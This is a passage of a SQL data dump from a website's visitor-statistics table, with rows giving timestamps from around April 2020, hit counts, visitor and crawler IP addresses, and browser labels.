1,1588042635,2,2,0,0,'178.154.200.112','other'),(501192,1588042946,1,1,0,0,'213.180.203.142','other'),(501193,1588043167,1,0,1,0,'66.249.64.25',''),(501194,1588043502,1,1,0,0,'178.154.200.19','other'),(501195,1588043723,1,1,0,0,'207.46.13.116','other'),(501196,1588043975,1,1,0,0,'178.154.200.97','other'),(501197,1588044181,1,1,0,0,'213.180.203.140','other'),(501198,1588044314,1,1,0,0,'157.55.39.206','other'),(501199,1588044633,1,1,0,0,'207.46.13.219','other'),(501200,1588044682,1,1,0,0,'178.154.200.216','other'),(501201,1588044992,1,1,0,0,'213.180.203.101','other'),(501202,1588045170,1,1,0,0,'178.154.200.155','other'),(501203,1588045480,1,1,0,0,'207.46.13.116','other'),(501204,1588045760,8,8,0,0,'77.120.98.235','other'),(501205,1588046074,1,1,0,0,'213.180.203.140','other'),(501206,1588046088,1,1,0,0,'213.180.203.90','other'),(501207,1588046624,1,1,0,0,'178.154.200.112','other'),(501208,1588046631,1,1,0,0,'66.249.64.25','chrome'),(501209,1588047095,1,1,0,0,'8.29.198.27','other'),(501210,1588047526,1,1,0,0,'8.29.198.25','other'),(501211,1588047582,1,1,0,0,'178.154.200.119','other'),(501212,1588047601,1,1,0,0,'178.154.200.222','other'),(501213,1588048007,1,1,0,0,'213.180.203.148','other'),(501214,1588048201,1,1,0,0,'213.180.203.70','other'),(501215,1588048670,2,2,0,0,'178.154.200.112','other'),(501216,1588048863,1,1,0,0,'178.154.200.87','other'),(501217,1588048931,1,1,0,0,'213.180.203.29','other'),(501218,1588049007,1,1,0,0,'207.46.13.116','other'),(501219,1588049161,1,1,0,0,'31.13.103.7','other'),(501220,1588049163,1,1,0,0,'31.13.103.19','other'),(501221,1588049178,1,1,0,0,'31.13.103.1','other'),(501222,1588049180,1,1,0,0,'31.13.103.14','other'),(501223,1588049200,2,2,0,0,'31.13.103.16','other'),(501224,1588049201,1,1,0,0,'31.13.103.24','other'),(501228,1588049236,2,2,0,0,'31.13.103.2','other'),(501229,1588049237,1,1,0,0,'31.13.103.17','other'),(501230,1588049238,2,2,0,0,'31.13.103.12','other'),(501232,1588049247,1,1,0,0,'31.13.103.10','other'),(501233,1588049249,1,1,0,0,'31.13.103.3','other'),(501234,1588049342,1,1,0,0,'66.249.64.23','chrome'),(501235,1588049350,1,1,0,0,'207.46.13.219','other'),(501236,1588049512,1,0,1,0,'66.249.64.25',''),(501237,1588049557,1,1,0,0,'178.154.200.119','other'),(501238,1588049766,1,1,0,0,'178.154.200.220','other'),(501239,1588050049,1,1,0,0,'66.249.64.24','chrome'),(501240,1588050852,3,3,0,0,'178.154.200.222','other'),(501241,1588050888,2,2,0,0,'213.180.203.16','other'),(501242,1588050959,1,1,0,0,'207.46.13.219','other'),(501243,1588052101,2,2,0,0,'91.196.177.60','other'),(501244,1588052255,1,1,0,0,'95.132.57.71','firefox'),(501245,1588052820,1,1,0,0,'178.154.200.222','other'),(501246,1588052834,1,1,0,0,'157.55.39.206','other'),(501247,1588053005,1,1,0,0,'178.154.200.196','other'),(501248,1588053106,8,8,0,0,'77.120.98.235','other'),(501249,1588053334,2,2,0,0,'213.180.203.16','other'),(501250,1588053763,1,1,0,0,'66.249.64.23','chrome'),(501251,1588054033,1,1,0,0,'157.55.39.206','other'),(501252,1588054235,1,1,0,0,'178.154.200.97','other'),(501253,1588054242,1,1,0,0,'178.154.200.196','other'),(501254,1588054660,2,2,0,0,'178.154.200.222','other'),(501255,1588054932,1,1,0,0,'37.73.106.126','chrome'),(501256,1588055162,2,2,0,0,'178.154.200.196','other'),(501257,1588056301,2,2,0,0,'178.95.159.205','chrome'),(501258,1588056344,1,1,0,0,'207.46.13.116','other'),(501259,1588056408,2,2,0,0,'178.154.200.222','other'),(501260,1588056532,1,1,0,0,'213.180.203.16','other'),(501261,1588057175,1,1,0,0,'178.154.200.220','other'),(501262,1588057217,1,1,0,0,'178.154.200.97','other'),(501263,1588057478,1,1,0,0,'91.196.177.46','chrome'),(501264,1588057932,1,1,0,0,'8.29.198.25','other'),(501265,1588057954,1,1,0,0,'207.46.13.219','other'),(501266,1588058359,1,1,0,0,'8.29.198.26','other'),(501267,1588058416,1,1,0,0,'37.54.164.87','chrome'),(501268,1588058687,2,2,0,0,'157.55.39.206','other'),(501269,1588059081,1,1,0,0,'213.180.203.16','other'),(501270,1588059763,1,1,0,0,'66.249.64.24','chrome'),(501271,1588059895,1,1,0,0,'207.46.13.219','other'),(501272,1588060239,2,2,0,0,'178.154.200.222','other'),(501273,1588060690,1,1,0,0,'66.249.64.23','chrome'),(501274,1588060716,8,8,0,0,'77.120.98.235','other'),(501275,1588060815,1,1,0,0,'37.73.0.151','chrome'),(501276,1588060867,1,1,0,0,'195.88.158.183','chrome'),(501277,1588061091,3,3,0,0,'213.180.203.16','other'),(501278,1588061205,1,1,0,0,'207.46.13.116','other'),(501279,1588062184,1,1,0,0,'157.55.39.206','other'),(501280,1588062717,2,2,0,0,'178.154.200.222','other'),(501281,1588064038,1,1,0,0,'91.225.165.239','chrome'),(501282,1588064406,1,1,0,0,'195.5.38.135','chrome'),(501283,1588064853,1,1,0,0,'157.55.39.206','other'),(501284,1588065599,4,4,0,0,'178.154.200.222','other'),(501285,1588066536,1,1,0,0,'178.154.200.220','other'),(501286,1588067624,1,1,0,0,'157.55.39.206','other'),(501287,1588067678,2,2,0,0,'54.171.31.136','chrome'),(501288,1588067802,2,2,0,0,'178.154.200.222','other'),(501289,1588067882,1,1,0,0,'178.154.200.220','other'),(501290,1588067918,1,1,0,0,'3.12.164.183','chrome'),(501291,1588067944,1,1,0,0,'178.172.147.237','chrome'),(501292,1588068093,1,1,0,0,'91.196.178.183','chrome'),(501293,1588068147,1,1,0,0,'176.111.33.18','firefox'),(501294,1588068340,1,1,0,0,'207.46.13.116','other'),(501295,1588068520,8,8,0,0,'77.120.98.235','other'),(501296,1588068768,1,1,0,0,'8.29.198.26','other'),(501297,1588069191,1,1,0,0,'8.29.198.27','other'),(501298,1588069280,1,1,0,0,'213.180.203.16','other'),(501299,1588069854,2,2,0,0,'157.55.39.206','other'),(501300,1588070088,1,1,0,0,'213.180.203.17','other'),(501301,1588070096,2,2,0,0,'207.46.13.116','other'),(501302,1588070337,1,1,0,0,'213.180.203.16','other'),(501303,1588070491,2,2,0,0,'178.154.200.222','other'),(501304,1588071359,1,1,0,0,'37.73.106.126','chrome'),(501305,1588071395,1,1,0,0,'207.46.13.219','other'),(501306,1588071664,1,1,0,0,'207.46.13.116','other'),(501307,1588071759,1,1,0,0,'213.180.203.17','other'),(501308,1588072310,2,2,0,0,'178.154.200.196','other'),(501309,1588072353,1,1,0,0,'91.196.178.16','chrome'),(501310,1588072394,1,1,0,0,'157.55.39.206','other'),(501311,1588072593,2,2,0,0,'46.201.105.170','chrome'),(501312,1588072601,1,1,0,0,'207.46.13.219','other'),(501313,1588072647,1,1,0,0,'178.154.200.220','other'),(501314,1588072769,1,1,0,0,'178.154.200.222','other'),(501315,1588073405,1,1,0,0,'91.196.178.16','chrome'),(501316,1588073456,1,1,0,0,'173.252.111.9','other'),(501317,1588073459,1,1,0,0,'173.252.111.12','other'),(501318,1588073460,1,1,0,0,'173.252.111.15','other'),(501319,1588073498,1,1,0,0,'173.252.111.10','other'),(501320,1588073499,1,1,0,0,'173.252.111.22','other'),(501321,1588073500,1,1,0,0,'207.46.13.116','other'),(501322,1588073557,1,1,0,0,'91.196.178.179','other'),(501323,1588073661,1,1,0,0,'69.171.251.12','other'),(501324,1588073724,1,1,0,0,'91.196.178.86','chrome'),(501325,1588073798,1,1,0,0,'46.211.141.248','chrome'),(501326,1588073843,1,1,0,0,'95.134.221.157','other'),(501327,1588073998,1,1,0,0,'91.196.178.45','chrome'),(501328,1588074030,1,1,0,0,'109.74.154.72','chrome'),(501329,1588074045,1,1,0,0,'91.196.178.188','other'),(501330,1588074585,1,1,0,0,'91.196.178.125','chrome'),(501331,1588074596,1,1,0,0,'178.154.200.196','other'),(501332,1588074600,2,2,0,0,'207.46.13.219','other'),(501333,1588074605,2,2,0,0,'157.55.39.206','other'),(501334,1588074822,1,1,0,0,'207.46.13.116','other'),(501335,1588075051,1,1,0,0,'95.132.55.207','chrome'),(501336,1588075330,1,1,0,0,'91.124.119.55','chrome'),(501337,1588075416,1,1,0,0,'46.201.174.171','chrome'),(501338,1588075427,1,1,0,0,'46.211.12.218','chrome'),(501339,1588075891,3,3,0,0,'213.180.203.16','other'),(501340,1588076238,1,1,0,0,'66.249.64.23','chrome'),(501341,1588076305,1,1,0,0,'37.73.106.126','chrome'),(501342,1588076339,8,8,0,0,'77.120.98.235','other'),(501343,1588076888,1,1,0,0,'213.180.203.16','other'),(501344,1588076926,1,1,0,0,'95.134.116.72','chrome'),(501345,1588076995,1,1,0,0,'178.154.200.222','other'),(501346,1588077010,1,1,0,0,'131.220.6.152','chrome'),(501347,1588077420,1,1,0,0,'66.249.64.25','chrome'),(501348,1588078166,1,1,0,0,'66.249.64.23','chrome'),(501349,1588078360,1,1,0,0,'91.124.118.80','chrome'),(501350,1588078466,1,1,0,0,'213.180.203.16','other'),(501351,1588079513,1,1,0,0,'207.46.13.116','other'),(501352,1588079596,1,1,0,0,'8.29.198.27','other'),(501353,1588079850,1,1,0,0,'66.249.64.23','chrome'),(501354,1588079993,1,1,0,0,'92.38.136.69','chrome'),(501355,1588080019,1,1,0,0,'8.29.198.25','other'),(501356,1588080069,1,1,0,0,'66.249.64.25','chrome'),(501357,1588080232,1,1,0,0,'213.180.203.16','other'),(501358,1588080755,1,1,0,0,'207.46.13.116','other'),(501359,1588081188,1,1,0,0,'51.77.52.160','chrome'),(501360,1588081786,1,1,0,0,'207.46.13.219','other'),(501361,1588081903,1,1,0,0,'213.180.203.16','other'),(501362,1588082257,1,1,0,0,'157.55.39.206','other'),(501363,1588082290,1,1,0,0,'66.249.64.23','chrome'),(501364,1588084144,8,8,0,0,'77.120.98.235','other'),(501365,1588084203,1,1,0,0,'213.180.203.29','other'),(501366,1588084207,1,1,0,0,'178.154.200.67','other'),(501367,1588084645,1,1,0,0,'91.196.178.182','chrome'),(501368,1588085316,1,1,0,0,'91.196.178.115','chrome'),(501369,1588086194,1,0,1,0,'66.249.64.25',''),(501370,1588086900,1,1,0,0,'91.196.178.123','chrome'),(501371,1588087010,1,1,0,0,'157.55.39.206','other'),(501372,1588087618,1,1,0,0,'178.154.200.175','other'),(501373,1588088034,2,2,0,0,'207.46.13.116','other'),(501374,1588088278,1,1,0,0,'91.196.178.83','firefox'),(501375,1588088889,3,3,0,0,'207.46.13.219','other'),(501376,1588089622,1,1,0,0,'34.207.175.252','chrome'),(501377,1588089722,1,1,0,0,'213.180.203.16','other'),(501378,1588090289,2,0,2,0,'157.55.39.206',''),(501379,1588090294,1,1,0,0,'66.249.64.24','chrome'),(501380,1588090318,1,1,0,0,'207.46.13.116','other'),(501381,1588090430,1,1,0,0,'8.29.198.25','other'),(501382,1588090757,1,1,0,0,'207.46.13.219','other'),(501383,1588090851,1,1,0,0,'8.29.198.27','other'),(501384,1588091352,1,1,0,0,'91.196.178.145','chrome'),(501385,1588091447,1,1,0,0,'173.252.111.8','other'),(501386,1588091939,8,8,0,0,'77.120.98.235','other'),(501387,1588091961,1,1,0,0,'173.252.95.30','other'),(501388,1588092065,3,3,0,0,'178.154.200.220','other'),(501389,1588092485,1,1,0,0,'173.252.111.8','other'),(501390,1588092486,1,1,0,0,'173.252.111.4','other'),(501391,1588092622,2,2,0,0,'157.55.39.206','other'),(501392,1588093618,1,1,0,0,'94.153.73.130','chrome'),(501393,1588093848,1,1,0,0,'213.180.203.16','other'),(501394,1588094096,1,0,1,0,'157.55.39.206',''),(501395,1588094419,1,1,0,0,'66.249.70.38','chrome'),(501396,1588095078,1,1,0,0,'157.55.39.206','other'),(501397,1588096072,1,1,0,0,'178.154.200.222','other'),(501398,1588096285,1,1,0,0,'31.13.115.21','other'),(501399,1588098501,1,1,0,0,'173.252.111.12','other'),(501400,1588099029,1,1,0,0,'157.55.39.206','other'),(501401,1588099643,1,1,0,0,'66.249.64.25','chrome'),(501402,1588100293,1,1,0,0,'207.46.13.116','other'),(501403,1588100421,8,8,0,0,'77.120.98.235','other'),(501404,1588101030,1,1,0,0,'91.196.178.85','chrome'),(501405,1588101253,1,1,0,0,'8.29.198.25','other'),(501406,1588101424,1,1,0,0,'66.249.70.33','chrome'),(501407,1588101682,1,1,0,0,'8.29.198.27','other'),(501408,1588102269,1,1,0,0,'157.55.39.206','other'),(501409,1588102384,1,1,0,0,'207.46.13.116','other'),(501410,1588103451,1,1,0,0,'157.55.39.206','other'),(501411,1588103559,1,1,0,0,'66.249.70.33','chrome'),(501412,1588103755,1,1,0,0,'91.196.178.60','chrome'),(501413,1588104182,1,1,0,0,'91.196.178.79','chrome'),(501414,1588105017,1,1,0,0,'157.55.39.206','other'),(501415,1588105542,1,1,0,0,'207.46.13.219','other'),(501416,1588106417,2,2,0,0,'157.55.39.206','other'),(501417,1588107153,2,2,0,0,'207.46.13.116','other'),(501418,1588108200,8,8,0,0,'77.120.98.235','other'),(501419,1588108294,1,1,0,0,'66.249.64.23','chrome'),(501420,1588108636,1,1,0,0,'157.55.39.206','other'),(501421,1588108797,1,1,0,0,'207.46.13.116','other'),(501422,1588109076,1,1,0,0,'207.46.13.219','other'),(501423,1588110044,1,1,0,0,'157.55.39.206','other'),(501424,1588110125,1,1,0,0,'66.249.70.36','chrome'),(501425,1588110594,2,2,0,0,'207.46.13.219','other'),(501426,1588112087,1,1,0,0,'8.29.198.25','other'),(501427,1588112253,1,1,0,0,'37.232.164.159','chrome'),(501428,1588112530,1,1,0,0,'8.29.198.27','other'),(501429,1588113823,1,1,0,0,'207.46.13.116','other'),(501430,1588116022,8,8,0,0,'77.120.98.235','other'),(501431,1588116418,1,1,0,0,'207.46.13.116','other'),(501432,1588116519,3,3,0,0,'66.249.64.24','chrome'),(501433,1588117171,1,1,0,0,'207.46.13.219','other'),(501434,1588118106,1,1,0,0,'62.205.134.182','other'),(501435,1588118320,1,1,0,0,'157.55.39.206','other'),(501436,1588120791,1,1,0,0,'66.249.64.24','chrome'),(501437,1588122027,1,1,0,0,'157.55.39.206','other'),(501438,1588122917,2,2,0,0,'8.29.198.25','other'),(501439,1588123527,1,1,0,0,'157.55.39.206','other'),(501440,1588123792,1,1,0,0,'66.249.64.25','chrome'),(501441,1588123960,8,8,0,0,'77.120.98.235','other'),(501442,1588123972,1,1,0,0,'207.46.13.219','other'),(501443,1588127504,1,1,0,0,'66.249.70.33','chrome'),(501444,1588127741,1,1,0,0,'207.46.13.116','other'),(501445,1588127991,1,1,0,0,'66.249.64.25','chrome'),(501446,1588128669,2,2,0,0,'207.46.13.116','other'),(501447,1588130577,1,1,0,0,'66.249.64.24','chrome'),(501448,1588130728,1,1,0,0,'178.159.37.88','chrome'),(501449,1588131563,8,8,0,0,'77.120.98.235','other'),(501450,1588131970,1,1,0,0,'207.46.13.116','other'),(501451,1588132714,1,0,1,0,'207.46.13.219',''),(501452,1588133744,1,1,0,0,'8.29.198.25','other'),(501453,1588134163,1,0,1,0,'157.55.39.206',''),(501454,1588134193,1,1,0,0,'8.29.198.26','other'),(501455,1588134223,1,1,0,0,'91.196.178.141','chrome'),(501456,1588135624,1,1,0,0,'62.205.134.182','other'),(501457,1588135749,1,1,0,0,'31.13.103.4','other'),(501458,1588135819,1,1,0,0,'95.132.19.191','other'),(501459,1588135958,1,1,0,0,'91.196.178.118','other'),(501460,1588138204,1,1,0,0,'207.46.13.219','other'),(501461,1588139009,8,8,0,0,'77.120.98.235','other'),(501462,1588139429,1,1,0,0,'207.46.13.219','other'),(501463,1588141438,1,1,0,0,'91.196.177.163','chrome'),(501464,1588141513,1,0,1,0,'66.249.64.23',''),(501465,1588141944,1,1,0,0,'91.196.178.85','chrome'),(501466,1588142143,1,1,0,0,'195.214.196.218','chrome'),(501467,1588142536,1,1,0,0,'37.73.126.96','other'),(501468,1588142634,1,0,1,0,'66.249.64.24',''),(501469,1588143352,1,1,0,0,'46.211.46.99','chrome'),(501470,1588144158,4,4,0,0,'157.55.39.206','other'),(501471,1588144576,1,1,0,0,'8.29.198.27','other'),(501472,1588144716,2,2,0,0,'207.46.13.116','other'),(501473,1588144817,2,2,0,0,'207.46.13.219','other'),(501474,1588145020,1,1,0,0,'8.29.198.25','other'),(501475,1588147176,8,8,0,0,'77.120.98.235','other'),(501476,1588147228,1,1,0,0,'31.13.127.9','other'),(501477,1588147309,1,1,0,0,'5.44.169.215','chrome'),(501478,1588148563,1,1,0,0,'31.13.115.1','other'),(501479,1588148841,1,1,0,0,'185.30.202.111','chrome'),(501480,1588149254,1,1,0,0,'37.55.224.48','other'),(501481,1588149881,1,1,0,0,'157.55.39.206','other'),(501482,1588150348,1,1,0,0,'66.249.64.25','chrome'),(501483,1588150867,2,2,0,0,'207.46.13.116','other'),(501484,1588152488,1,1,0,0,'91.196.178.168','chrome'),(501485,1588153910,1,1,0,0,'66.249.64.23','chrome'),(501486,1588153971,1,1,0,0,'91.196.178.189','chrome'),(501487,1588154569,1,1,0,0,'66.249.64.24','chrome'),(501488,1588154727,1,1,0,0,'188.231.162.182','chrome'),(501489,1588154740,1,1,0,0,'3.223.127.212','chrome'),(501490,1588154865,3,3,0,0,'157.55.39.206','other'),(501491,1588155091,1,1,0,0,'213.180.203.16','other'),(501492,1588155392,1,1,0,0,'85.207.47.135','chrome'),(501493,1588155404,2,2,0,0,'8.29.198.26','other'),(501494,1588155410,8,8,0,0,'77.120.98.235','other'),(501495,1588155966,1,1,0,0,'66.249.64.24','chrome'),(501496,1588156186,2,2,0,0,'207.46.13.219','other'),(501497,1588156256,1,1,0,0,'178.154.200.196','other'),(501498,1588156490,2,2,0,0,'3.249.111.134','chrome'),(501499,1588156937,2,2,0,0,'66.249.64.24','chrome'),(501500,1588157868,1,1,0,0,'91.124.82.16','firefox'),(501501,1588157886,1,1,0,0,'207.46.13.219','other'),(501502,1588158223,2,2,0,0,'157.55.39.206','other'),(501503,1588158422,2,2,0,0,'95.213.141.126','opera'),(501504,1588158426,1,1,0,0,'66.249.64.24','chrome'),(501505,1588159371,1,1,0,0,'213.180.203.140','other'),(501506,1588159670,1,1,0,0,'66.249.64.24','chrome'),(501507,1588159684,1,1,0,0,'13.66.139.0','other'),(501508,1588160243,1,1,0,0,'66.249.70.42','chrome'),(501509,1588160453,3,3,0,0,'207.46.13.219','other'),(501510,1588160463,1,1,0,0,'207.46.13.116','other'),(501511,1588160467,1,1,0,0,'157.55.39.206','other'),(501512,1588160489,1,1,0,0,'213.180.203.95','other'),(501513,1588162238,1,1,0,0,'173.252.111.17','other'),(501514,1588162246,1,1,0,0,'109.74.154.72','chrome'),(501515,1588162319,1,1,0,0,'88.99.2.203','other'),(501516,1588162458,1,1,0,0,'66.249.70.38','chrome'),(501517,1588162984,1,1,0,0,'131.220.6.152','chrome'),(501518,1588163181,1,1,0,0,'66.249.64.24','chrome'),(501519,1588163736,1,1,0,0,'66.249.64.25','chrome'),(501520,1588163807,2,2,0,0,'157.55.39.206','other'),(501521,1588163908,2,2,0,0,'178.154.200.222','other'),(501522,1588164185,8,8,0,0,'77.120.98.235','other'),(501523,1588165332,1,1,0,0,'178.154.200.222','other'),(501524,1588165802,1,1,0,0,'66.249.64.25','chrome'),(501525,1588166096,2,2,0,0,'66.249.64.23','chrome'),(501526,1588166237,2,2,0,0,'8.29.198.25','other'),(501527,1588166281,2,2,0,0,'207.46.13.116','other'),(501528,1588166661,1,1,0,0,'66.249.64.24','chrome'),(501529,1588167018,2,2,0,0,'66.249.64.23','chrome'),(501530,1588167347,1,1,0,0,'66.249.64.25','chrome'),(501531,1588167924,1,1,0,0,'66.249.64.24','chrome'),(501532,1588168061,1,1,0,0,'157.55.39.206','other'),(501533,1588168094,2,2,0,0,'167.99.88.132','chrome'),(501534,1588168590,1,1,0,0,'66.249.70.38','chrome'),(501535,1588168769,1,1,0,0,'213.180.203.16','other'),(501536,1588170388,1,1,0,0,'91.196.178.146','chrome'),(501537,1588170517,1,1,0,0,'66.249.64.23','chrome'),(501538,1588171901,1,1,0,0,'66.249.64.25','chrome'),(501539,1588171989,2,2,0,0,'66.249.64.23','chrome'),(501540,1588172096,2,2,0,0,'34.254.246.252','chrome'),(501541,1588172422,8,8,0,0,'77.120.98.235','other'),(501542,1588173147,1,1,0,0,'178.154.200.222','other'),(501543,1588173261,2,2,0,0,'207.46.13.116','other'),(501544,1588173866,2,2,0,0,'66.249.64.25','chrome'),(501545,1588173886,1,1,0,0,'207.46.13.219','other'),(501546,1588174707,1,1,0,0,'91.196.178.75','firefox'),(501547,1588175134,1,1,0,0,'207.46.13.116','other'),(501548,1588175584,1,1,0,0,'207.46.13.219','other'),(501549,1588176874,3,3,0,0,'178.154.200.222','other'),(501550,1588177069,1,1,0,0,'8.29.198.26','other'),(501551,1588177330,1,1,0,0,'51.89.201.9','firefox'),(501552,1588177526,1,1,0,0,'8.29.198.27','other'),(501553,1588177561,2,2,0,0,'66.249.64.23','chrome'),(501554,1588178086,1,1,0,0,'66.249.64.25','chrome'),(501555,1588178891,1,1,0,0,'91.196.178.88','chrome'),(501556,1588179060,2,2,0,0,'207.46.13.116','other'),(501557,1588179267,1,1,0,0,'66.249.70.38','chrome'),(501558,1588179309,1,1,0,0,'173.252.111.16','other'),(501559,1588179900,1,1,0,0,'66.249.64.24','chrome'),(501560,1588180462,1,1,0,0,'207.46.13.219','other'),(501561,1588180810,2,2,0,0,'213.180.203.16','other'),(501562,1588181073,8,8,0,0,'77.120.98.235','other'),(501563,1588181107,1,1,0,0,'207.46.13.52','other'),(501564,1588181328,1,1,0,0,'91.196.178.69','firefox'),(501565,1588181365,1,1,0,0,'37.73.196.50','chrome'),(501566,1588181966,2,2,0,0,'207.46.13.116','other'),(501567,1588181997,1,1,0,0,'66.249.64.25','chrome'),(501568,1588182004,1,1,0,0,'92.113.191.19','chrome'),(501569,1588183196,1,1,0,0,'213.180.203.16','other'),(501570,1588183643,1,1,0,0,'66.249.64.24','chrome'),(501571,1588183649,1,1,0,0,'173.252.111.18','other'),(501572,1588183851,2,2,0,0,'207.46.13.219','other'),(501573,1588183982,1,1,0,0,'66.249.64.23','chrome'),(501574,1588184083,1,1,0,0,'213.180.203.140','other'),(501575,1588185420,1,1,0,0,'66.249.70.33','chrome'),(501576,1588185502,1,1,0,0,'66.249.64.24','chrome'),(501577,1588185700,1,1,0,0,'207.46.13.57','other'),(501578,1588185853,1,1,0,0,'178.154.200.222','other'),(501579,1588186059,1,1,0,0,'91.196.178.35','chrome'),(501580,1588186342,1,1,0,0,'66.249.64.25','chrome'),(501581,1588186649,1,1,0,0,'207.46.13.57','other'),(501582,1588186917,1,1,0,0,'91.196.178.157','chrome'),(501583,1588187168,1,1,0,0,'207.46.13.219','other'),(501584,1588187570,1,1,0,0,'178.154.200.222','other'),(501585,1588187914,1,1,0,0,'8.29.198.25','other'),(501586,1588188032,1,1,0,0,'46.211.2.200','chrome'),(501587,1588188364,1,1,0,0,'8.29.198.26','other'),(501588,1588188388,1,1,0,0,'207.46.13.219','other'),(501589,1588188895,1,1,0,0,'66.249.64.23','chrome'),(501590,1588189024,8,8,0,0,'77.120.98.235','other'),(501591,1588189074,1,1,0,0,'94.153.29.217','chrome'),(501592,1588189748,1,1,0,0,'207.46.13.116','other'),(501593,1588190218,1,1,0,0,'173.252.111.13','other'),(501594,1588190278,4,4,0,0,'66.249.64.24','chrome'),(501595,1588190658,1,1,0,0,'66.249.64.25','chrome'),(501596,1588190801,1,1,0,0,'66.249.64.23','chrome'),(501597,1588191421,2,2,0,0,'207.46.13.219','other'),(501598,1588191508,1,1,0,0,'91.196.178.151','chrome'),(501599,1588191607,2,2,0,0,'178.154.200.222','other'),(501600,1588192273,2,2,0,0,'207.46.13.116','other'),(501601,1588193097,1,1,0,0,'207.46.13.7','other'),(501602,1588193470,2,2,0,0,'66.249.64.23','chrome'),(501603,1588193563,1,1,0,0,'37.73.105.142','chrome'),(501604,1588194068,1,1,0,0,'207.46.13.57','other'),(501605,1588194078,1,1,0,0,'178.154.200.220','other'),(501606,1588194548,1,1,0,0,'157.55.39.251','other'),(501607,1588195297,1,1,0,0,'178.154.200.119','other'),(501608,1588196023,1,1,0,0,'157.55.39.42','other'),(501609,1588196610,2,2,0,0,'66.249.64.24','chrome'),(501610,1588197006,1,1,0,0,'82.202.161.133','other'),(501611,1588197382,2,2,0,0,'157.55.39.251','other'),(501612,1588197905,1,1,0,0,'178.154.200.222','other'),(501613,1588198304,8,8,0,0,'77.120.98.235','other'),(501614,1588198602,1,1,0,0,'66.249.64.23','chrome'),(501615,1588198747,2,2,0,0,'8.29.198.25','other'),(501616,1588199960,1,1,0,0,'213.180.203.16','other'),(501617,1588200126,2,2,0,0,'178.154.200.222','other'),(501618,1588200392,1,1,0,0,'178.154.200.175','other'),(501619,1588200468,2,2,0,0,'66.249.64.23','chrome'),(501620,1588201874,1,1,0,0,'207.46.13.57','other'),(501621,1588202829,1,1,0,0,'157.55.39.251','other'),(501622,1588203156,1,1,0,0,'178.154.200.220','other'),(501623,1588203178,1,1,0,0,'207.46.13.116','other'),(501624,1588203301,1,1,0,0,'95.216.96.243','other'),(501625,1588203396,1,1,0,0,'178.154.200.222','other'),(501626,1588204041,2,2,0,0,'66.249.64.23','chrome'),(501627,1588204507,1,1,0,0,'62.205.134.182','other'),(501628,1588204761,1,1,0,0,'157.55.39.42','other'),(501629,1588205115,1,1,0,0,'178.154.200.222','other'),(501630,1588205853,2,2,0,0,'66.249.64.23','chrome'),(501631,1588206157,1,1,0,0,'213.180.203.16','other'),(501632,1588206215,8,8,0,0,'77.120.98.235','other'),(501633,1588206264,3,2,1,0,'207.46.13.57',''),(501634,1588206337,1,1,0,0,'157.55.39.42','other'),(501635,1588206900,1,1,0,0,'157.55.39.251','other'),(501636,1588207583,1,1,0,0,'207.46.13.57','other'),(501637,1588208941,1,1,0,0,'66.249.64.24','chrome'),(501638,1588209575,2,2,0,0,'8.29.198.25','other'),(501639,1588209886,2,1,1,0,'66.249.64.24',''),(501640,1588210134,1,1,0,0,'66.249.64.23','chrome'),(501641,1588210298,1,1,0,0,'178.154.200.222','other'),(501642,1588210773,1,1,0,0,'207.46.13.57','other'),(501643,1588211760,1,1,0,0,'66.249.64.25','chrome'),(501644,1588211891,1,1,0,0,'92.38.136.69','chrome'),(501645,1588212907,1,1,0,0,'157.55.39.251','other'),(501646,1588213160,1,1,0,0,'66.249.64.24','chrome'),(501647,1588213649,1,1,0,0,'157.55.39.42','other'),(501648,1588213764,1,1,0,0,'66.249.64.23','chrome'),(501649,1588214556,8,8,0,0,'77.120.98.235','other'),(501650,1588214685,1,1,0,0,'157.55.39.42','other'),(501651,1588214919,1,1,0,0,'66.249.70.38','chrome'),(501652,1588215513,2,2,0,0,'66.249.64.25','chrome'),(501653,1588216669,1,1,0,0,'178.154.200.222','other'),(501654,1588217418,1,1,0,0,'66.220.149.3','other'),(501655,1588217423,1,1,0,0,'66.249.64.24','chrome'),(501656,1588217664,1,1,0,0,'188.163.82.118','chrome'),(501657,1588218230,1,0,1,0,'157.55.39.42',''),(501658,1588218599,1,1,0,0,'66.249.70.36','chrome'),(501659,1588218867,1,1,0,0,'66.249.64.25','chrome'),(501660,1588219071,1,1,0,0,'66.249.70.38','chrome'),(501661,1588219389,1,1,0,0,'66.249.64.23','chrome'),(501662,1588220037,1,1,0,0,'157.55.39.42','other'),(501663,1588220402,1,1,0,0,'8.29.198.26','other'),(501664,1588220880,1,1,0,0,'8.29.198.25','other'),(501665,1588221645,1,1,0,0,'157.55.39.42','other'),(501666,1588221765,1,1,0,0,'62.205.134.182','other'),(501667,1588222558,8,8,0,0,'77.120.98.235','other'),(501668,1588222570,2,2,0,0,'157.55.39.251','other'),(501669,1588222714,3,3,0,0,'66.249.64.24','chrome'),(501670,1588222896,3,3,0,0,'178.154.200.222','other'),(501671,1588223510,1,1,0,0,'157.55.39.251','other'),(501672,1588224001,1,1,0,0,'31.13.103.9','other'),(501673,1588224290,2,2,0,0,'66.249.64.23','chrome'),(501674,1588224603,1,1,0,0,'66.249.70.33','chrome'),(501675,1588225563,1,1,0,0,'66.249.70.33','chrome'),(501676,1588225981,1,1,0,0,'66.249.64.25','chrome'),(501677,1588226183,1,1,0,0,'91.196.178.89','chrome'),(501678,1588226467,1,0,1,0,'207.46.13.219',''),(501679,1588226664,1,1,0,0,'31.13.127.28','other'),(501680,1588226794,1,1,0,0,'213.180.203.16','other'),(501681,1588226991,2,2,0,0,'66.249.64.23','chrome'),(501682,1588227260,1,1,0,0,'157.55.39.251','other'),(501683,1588227298,1,1,0,0,'109.70.106.130','other'),(501684,1588227700,2,2,0,0,'66.249.64.24','chrome'),(501685,1588228318,1,1,0,0,'157.55.39.42','other'),(501686,1588228991,2,2,0,0,'178.154.200.222','other'),(501687,1588229049,1,1,0,0,'213.180.203.142','other'),(501688,1588229084,1,1,0,0,'207.46.13.219','other'),(501689,1588230796,8,8,0,0,'77.120.98.235','other'),(501690,1588231006,1,1,0,0,'66.249.64.24','chrome'),(501691,1588231206,1,1,0,0,'66.249.64.23','chrome'),(501692,1588231230,1,1,0,0,'8.29.198.27','other'),(501693,1588231513,1,1,0,0,'178.154.200.222','other'),(501694,1588231687,1,1,0,0,'157.55.39.251','other'),(501695,1588231692,1,1,0,0,'157.55.39.42','other'),(501696,1588231713,1,1,0,0,'8.29.198.25','other'),(501697,1588231875,1,1,0,0,'91.196.178.141','chrome'),(501698,1588233357,1,1,0,0,'66.249.64.25','chrome'),(501699,1588233475,1,1,0,0,'66.249.64.24','chrome'),(501700,1588234167,1,1,0,0,'66.249.64.23','chrome